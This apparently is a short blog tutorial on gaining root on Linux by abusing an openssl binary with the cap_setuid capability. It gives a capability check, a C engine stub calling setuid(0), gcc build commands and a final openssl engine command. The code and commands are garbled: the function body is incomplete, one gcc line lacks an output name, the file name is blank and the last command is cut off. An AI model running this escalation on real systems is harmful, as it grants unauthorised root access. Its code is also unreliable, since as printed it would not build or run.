Linux-Privilege Escalation


Would be covering some linux priviledge escalation techniques from basic to advanced here.

OpenSSL cap_setuid+ep

Run the following command to check for the set capabilities on the target machine.
getcap -r / 2>/dev/null
if you see /usr/bin/openssl = cap_setuid+ep, we can exploit this box with this method.
on your attack machine you need to craft an exploit code in C.
For this exploit to work, you need to have the libssl-dev package installed; if you don’t, you can easily install it with the following code:
sudo apt-get install libssl-dev

Time to craft the exploit:

Create a file named ssl-ploit.c, or whatever you like XD. Write the following into the file. 👻

#include <openssl/engine.h>

static int bind(ENGINE *e, const char *id)
 setuid(0); setgid(0);



run the following commands:

1. gcc -fPIC -o ssl-ploit.o -c ssl-ploit.c  
2. gcc -shared -o -lcrypt ssl-ploit.o  

finally; the exploit is complete 💥. You should get a '<whatever_name_you_saved_your_exploit_as>'.so file. in my case, .


Now you’ve got just one more thing to do, you need to transfer the file to the target machine. (you can send it to /dev/shm or your home directory using python-simple-webserver or scp)
Then run the exploit :)

user@server$ openssl eng -engine ./
root@server# whoami

FInally Root 📸; Thanks for reading. Sayonara~🍻